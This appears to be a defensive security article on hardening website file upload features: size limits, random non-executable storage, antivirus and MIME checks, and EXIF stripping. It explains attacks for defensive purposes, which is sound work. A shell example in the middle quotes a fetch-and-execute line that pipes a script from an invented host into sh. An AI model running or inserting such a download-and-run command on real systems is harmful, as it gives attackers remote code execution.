File upload features allow users to upload arbitrary data to a website. Reasons for providing this feature range from image and video uploads on social media sites, to PDF uploads for financial services sites, to document uploads for repository sites. However, as we will discuss, successfully implementing these features presents many security and design challenges. Whilst the particular reasons for providing file upload features are not the focus of our discussion here, we will assume a generic use case arising from the requirement to upload some form of binary data to a website.
Penetration testers will pay close attention to any file upload feature when testing a site for vulnerabilities. Testing will typically involve the submission of EICAR test virus payloads, oversize payloads, wrongly named and wrongly sized payloads, payloads masquerading as different types of file content, and so forth. They will carefully test the defences and responses of upload functions because they fully appreciate the problems that can arise when these are not properly secured.

Within the field of information security, we need to concern ourselves with the risk exposed by certain system features. Typically, these risks are categorized in terms of their impact on the underlying system and on the wider organisation. Of particular concern are software vulnerabilities leading to Remote Code Execution (RCE), or Arbitrary Code Execution (ACE). RCE is a particularly damaging type of server vulnerability in which a remote attacker with network access manages to install and execute their own code on our servers. Once malicious code is running on a server, the server effectively falls under the control of the attacker. In many cases the compromise will remain hidden, providing the attacker with a foothold within the organisation from which to perform further system compromise.
From the perspective of a potential attacker, there are three steps required to achieve this code execution:

1. Place a malicious payload on the target server.
2. Determine the location and name of that payload on the server.
3. Cause the server to execute it.

This is analogous to the way our computers boot. When we power on our computers, an initialization process begins in the computer's non-volatile ROM or flash storage. This first stage typically reads a small piece of code contained within the first sector of the hard disk. That small piece of code in turn loads a larger, more functional program which understands file system structures. This larger program loads the operating system kernel into memory and transfers control to it. Finally, the operating system initializes itself before handing control to the user.
Many remote code execution exploits follow a similar process. The initial code that gets executed as part of step 3 above can be as simple as a single shell command which downloads a larger, more capable script from a compromised server and executes it. Whilst such a one-liner targets Unix-based servers, similar scripts can be constructed in PowerShell for Windows servers. Part of an attacker's initial reconnaissance will therefore involve discovering the underlying operating system.
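As a harmless illustration of this fetch-then-execute bootstrap pattern (the host below is an invented documentation address, and the network download is simulated with a local file so the snippet can be run safely):

```shell
# A real attack's bootstrap would be a single line such as (host invented):
#   curl -s http://198.51.100.7/stage2.sh | sh
# Here we simulate the same "fetch a larger script, then execute it" pattern
# locally and harmlessly:
printf 'echo stage2 running\n' > /tmp/stage2_demo.sh   # stand-in for the download
stage2_output=$(sh /tmp/stage2_demo.sh)                # stand-in for "| sh"
echo "$stage2_output"
rm -f /tmp/stage2_demo.sh
```

The point is the shape of the attack: a tiny first stage whose only job is to pull in and run a larger second stage.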
Essentially, providing a file upload feature is the ready-made provision of step 1. If the system allows the attacker to specify a filename that the server dutifully uses, step 2 may also be available to the attacker.

Upload functions should be subject to maximum upload sizes and rate limiting, which also allows for worst-case storage planning. For example, if 1,000 users are each allowed 10 uploads per day of 1 MB maximum, the worst-case storage requirement is approximately 10 GB per day. When receiving a payload, the maximum payload size should be strictly enforced to prevent unreasonably large payloads being uploaded. Many large payloads may exhaust the server's storage, creating a Denial of Service (DoS) attack vector.
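The storage arithmetic above is easy to sanity-check (figures taken directly from the example; the 1 MB cap is interpreted here as 2^20 bytes):

```python
# Worst-case storage planning for the quota described in the text:
# 1,000 users, 10 uploads each per day, 1 MB maximum per upload.
users = 1000
uploads_per_user_per_day = 10
max_upload_bytes = 1 * 1024 * 1024  # 1 MB cap per upload

worst_case_bytes_per_day = users * uploads_per_user_per_day * max_upload_bytes
print(worst_case_bytes_per_day)                  # 10485760000 bytes
print(round(worst_case_bytes_per_day / 1e9, 1))  # ~10.5, i.e. roughly 10 GB/day
```

Enforcing the per-upload cap server-side is what makes this worst case trustworthy; a limit advertised only to the client can simply be ignored by an attacker.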
Critically, assume nothing about the contents of the file you have been given; assume its contents to be hostile until proven otherwise. Any data provided alongside the binary payload, such as date, time, filename, file type or MIME type, file size, etc., should be discarded, or logged before discarding. All this metadata can be very easily forged, so it is best to treat it as unreliable and ignore it.

Log all upload activity and store client information such as the IP address, User-Agent string, etc. Again, whilst not necessarily reliable information, this will allow for correlation and investigation of potential abuse patterns.
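A minimal sketch of this "log it, then ignore it" approach using Python's standard logging module (the function and field names here are invented for illustration):

```python
import json
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("uploads")

def record_upload_metadata(client_ip, user_agent, claimed_name, claimed_mime):
    """Log everything the client claimed about an upload, then treat it as noise.

    None of these values is trusted or used for processing decisions; they are
    retained only so that abuse patterns can be correlated and investigated.
    """
    record = {
        "client_ip": client_ip,        # may be spoofed or sit behind a proxy
        "user_agent": user_agent,      # trivially forged
        "claimed_name": claimed_name,  # never reused as the on-disk name
        "claimed_mime": claimed_mime,  # verified independently later
    }
    log.info("upload: %s", json.dumps(record))
    return record

record_upload_metadata("203.0.113.9", "curl/8.4.0", "report.pdf", "application/pdf")
```

The important design point is the one-way flow: client-supplied metadata goes into the audit log, never into any processing decision.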
This leaves us with the binary payload, which in most cases will be written to disk in a temporary storage location ready for further processing. Whilst the filename provided as part of the upload metadata can be used for information purposes, it should not be used as the on-disk filename.

The location and name of this temporary file should be carefully considered. Ideally, the name should be completely random, providing protection against step 2 above, since the attacker now needs to determine both the filename and its location in order to execute it. The file should also live in a directory well away from the directory serving the website, possibly on a separate server, or under a separate user from the one running the web server software. It should also have all execute permissions removed, to help defend against step 3 above.
Once the browser upload process has completed, we should be left with a randomly named, non-executable disk file stored in a protected directory, owned by a different user from the one running the web server. This user should have bare-minimum filesystem permissions.

Before any further processing takes place, we should give anti-virus scanners an opportunity to inspect the file for known threats. This can be achieved using on-access scanners, which automatically scan the file once it is written to the filesystem, or on-demand scanners triggered after the initial upload. Multiple virus and malware scanners could be considered, and a file hash could also be submitted to VirusTotal for an extra layer of assurance. Note that in the case of VirusTotal we submit only the SHA-256 hash of the file, not the file contents, since submitting the contents may lead to an Information Disclosure vulnerability. In all cases, the upload workflow should take account of these delays and afford the scanners time to do their work.
Since we cannot assume the file data corresponds to the specified file type, we should run additional checks to establish that the payload contents are of the type expected by the function. A utility such as the Linux file command, which attempts to establish the corresponding MIME type for any given binary file, may help here. Note however that this is not foolproof, and malicious binary payloads can still be constructed to defeat such utilities.

From this point, further payload processing depends on the actual design requirements. In most cases an attempt should be made to normalize the file into a format that is both useful and performant for the application. Images, for example, can be downsized and scaled to a standard size before storing.
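The technique behind such utilities is signature ("magic byte") matching; a minimal sketch with a deliberately tiny, illustrative signature table (real deployments should rely on a maintained database such as the one behind the file utility):

```python
# A few well-known file signatures ("magic bytes"). This hand-rolled table is
# illustrative only; production code should use a maintained signature database.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"%PDF-": "application/pdf",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}

def sniff_mime(first_bytes):
    """Guess a MIME type from the leading bytes of a payload, or return None.

    Like the file utility, this is a heuristic: a hostile payload can carry a
    valid signature and still contain malicious content, so a match is a
    necessary check, never a proof of safety.
    """
    for magic, mime in SIGNATURES.items():
        if first_bytes.startswith(magic):
            return mime
    return None
```

A payload whose sniffed type disagrees with the type the upload function expects should simply be rejected.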
Additional processing may also be required. Many file types such as images, PDFs and Word documents contain metadata, some of which may be of a personal nature. Unless there is a specific application use for this data, it is recommended to strip it before storing. For instance, many JPEG image files contain EXIF data, which may include the GPS co-ordinates of the location where the image was taken.
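In a JPEG, EXIF data lives in the APP1 segment, so stripping it amounts to dropping that segment. A standard-library-only sketch follows; production code should prefer a maintained image library, since this minimal parser ignores some JPEG edge cases (such as padding bytes between segments):

```python
import io

def strip_jpeg_exif(jpeg_bytes):
    """Drop APP1 (EXIF/XMP) segments from a JPEG byte stream.

    Minimal sketch: handles the common marker-segment layout only.
    """
    src = io.BytesIO(jpeg_bytes)
    out = io.BytesIO()
    soi = src.read(2)
    if soi != b"\xff\xd8":  # Start of Image marker
        raise ValueError("not a JPEG stream")
    out.write(soi)
    while True:
        marker = src.read(2)
        if len(marker) < 2:
            break  # truncated input; emit what we have
        if marker == b"\xff\xda":  # Start of Scan: copy the rest verbatim
            out.write(marker)
            out.write(src.read())
            break
        length = int.from_bytes(src.read(2), "big")  # includes its own 2 bytes
        payload = src.read(length - 2)
        if marker != b"\xff\xe1":  # keep every segment except APP1
            out.write(marker + length.to_bytes(2, "big") + payload)
    return out.getvalue()
```

The same discard-by-default principle applies to other formats: keep only the metadata the application has an explicit use for.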